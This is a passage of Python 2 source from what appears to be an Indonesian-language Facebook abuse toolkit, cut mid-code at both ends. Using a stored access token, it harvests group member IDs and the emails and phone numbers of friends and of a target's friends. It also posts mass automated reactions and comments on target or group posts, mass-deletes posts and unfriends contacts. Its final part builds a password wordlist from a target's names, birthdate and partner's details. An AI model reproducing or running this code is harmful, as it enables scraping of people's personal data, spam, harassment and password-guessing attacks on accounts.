tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') b = open(simg, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket) s = json.loads(re.text) for i in s['data']: idmem.append(i['id']) b.write(i['id'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + i['name'] print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id'] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idmem) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + simg b.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(simg) print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def email(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: em.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(em) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(mails) print '\x1b[1;91m[!] Kesalahan terjadi' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def emailfrom_teman(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Belum berteman' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: emfromteman.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(emfromteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def nomor_hp(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') url = 'https://graph.facebook.com/me/friends?access_token=' + toket r = requests.get(url) z = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for n in z['data']: x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hp.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hp) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(noms) print '\x1b[1;91m[!] Kesalahan terjadi' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def hpfrom_teman(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Belum berteman' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hpfromteman.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hpfromteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def menu_bot(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Bot Reactions Target Post' print '\x1b[1;37;40m2. Bot Reactions Grup Post' print '\x1b[1;37;40m3. Bot Komen Target Post' print '\x1b[1;37;40m4. Bot Komen Grup Post' print '\x1b[1;37;40m5. Mass delete Post' print '\x1b[1;37;40m6. Terima permintaan pertemanan' print '\x1b[1;37;40m7. Hapus pertemanan' print '\x1b[1;31;40m0. Kembali' print bot_pilih() def bot_pilih(): bots = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if bots == '': print '\x1b[1;91m[!] Jangan kosong' bot_pilih() else: if bots == '1': menu_react() else: if bots == '2': grup_react() else: if bots == '3': bot_komen() else: if bots == '4': grup_komen() else: if bots == '5': deletepost() else: if bots == '6': accept() else: if bots == '7': unfriend() else: if bots == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mTidak ada' bot_pilih() def menu_react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. \x1b[1;97mLike' print '\x1b[1;37;40m2. \x1b[1;97mLove' print '\x1b[1;37;40m3. \x1b[1;97mWow' print '\x1b[1;37;40m4. \x1b[1;97mHaha' print '\x1b[1;37;40m5. \x1b[1;97mSedih' print '\x1b[1;37;40m6. \x1b[1;97mMarah' print '\x1b[1;31;40m0. Kembali' print react_pilih() def react_pilih(): global tipe aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] Jangan kosong' react_pilih() else: if aksi == '1': tipe = 'LIKE' react() else: if aksi == '2': tipe = 'LOVE' react() else: if aksi == '3': tipe = 'WOW' react() else: if aksi == '4': tipe = 'HAHA' react() else: if aksi == '5': tipe = 'SAD' react() else: if aksi == '6': tipe = 'ANGRY' react() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada' react_pilih() def react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') try: oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksi.append(y) requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksi)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def grup_react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. \x1b[1;97mLike' print '\x1b[1;37;40m2. \x1b[1;97mLove' print '\x1b[1;37;40m3. \x1b[1;97mWow' print '\x1b[1;37;40m4. \x1b[1;97mHaha' print '\x1b[1;37;40m5. \x1b[1;97mSedih' print '\x1b[1;37;40m6. \x1b[1;97mMarah' print '\x1b[1;31;40m0. Kembali' print reactg_pilih() def reactg_pilih(): global tipe aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] Jangan kosong' reactg_pilih() else: if aksi == '1': tipe = 'LIKE' reactg() else: if aksi == '2': tipe = 'LOVE' reactg() else: if aksi == '3': tipe = 'WOW' reactg() else: if aksi == '4': tipe = 'HAHA' reactg() else: if aksi == '5': tipe = 'SAD' reactg() else: if aksi == '6': tipe = 'ANGRY' reactg() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada' reactg_pilih() def reactg(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] try: oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksigrup.append(y) requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksigrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def bot_komen(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komen.append(f) requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komen)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def grup_komen(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komengrup.append(f) requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komengrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def deletepost(): os.system('clear') try: toket = open('login.txt', 'r').read() nam = requests.get('https://graph.facebook.com/me?access_token=' + toket) lol = json.loads(nam.text) nama = lol['name'] except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama jalan('\x1b[1;91m[+] \x1b[1;92mMulai menghapus postingan unfaedah\x1b[1;97m ...') print 40 * '\x1b[1;97m\xe2\x95\x90' asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket) asus = json.loads(asu.text) for p in asus['data']: id = p['id'] piro = 0 url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket) ok = json.loads(url.text) try: error = ok['error']['message'] print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mGagal' except TypeError: print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mTerhapus' piro += 1 except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Koneksi Error' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def accept(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket) teman = json.loads(r.text) if '[]' in str(teman['data']): print '\x1b[1;91m[!] Tidak ada permintaan pertemanan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in teman['data']: gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket) a = json.loads(gas.text) if 'error' in str(a): print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Gagal' print 40 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil' print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def unfriend(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;97mStop \x1b[1;91mCTRL+C' print try: pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) cok = json.loads(pek.text) for i in cok['data']: nama = i['name'] id = i['id'] requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket) print '\x1b[1;97m[\x1b[1;92mTerhapus\x1b[1;97m] ' + nama + ' => ' + id except IndexError: pass except KeyboardInterrupt: print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def lain(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Buat postingan' print '\x1b[1;37;40m2. Buat Wordlist' print '\x1b[1;37;40m3. Akun Checker' print '\x1b[1;37;40m4. Lihat daftar grup' print '\x1b[1;37;40m5. Profile Guard' print print '\x1b[1;97m ->Coming soon<-' print print '\x1b[1;31;40m0. Kembali' print pilih_lain() def pilih_lain(): other = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if other == '': print '\x1b[1;91m[!] Jangan kosong' pilih_lain() else: if other == '1': status() else: if other == '2': wordlist() else: if other == '3': check_akun() else: if other == '4': grupsaya() else: if other == '5': guard() else: if other == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mTidak ada' pilih_lain() def status(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' msg = raw_input('\x1b[1;91m[+] \x1b[1;92mKetik status \x1b[1;91m:\x1b[1;97m ') if msg == '': print '\x1b[1;91m[!] Jangan kosong' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() else: res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket) op = json.loads(res.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id'] raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() def wordlist(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah' print 40 * '\x1b[1;97m\xe2\x95\x90' a = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: ') file = open(a + '.txt', 'w') b = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: ') c = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: ') d = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: ') e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') f = e[0:2] g = e[2:4] h = e[4:] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v' i = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: ') j = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: ') k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') l = k[0:2] m = k[2:4] n = k[4:] 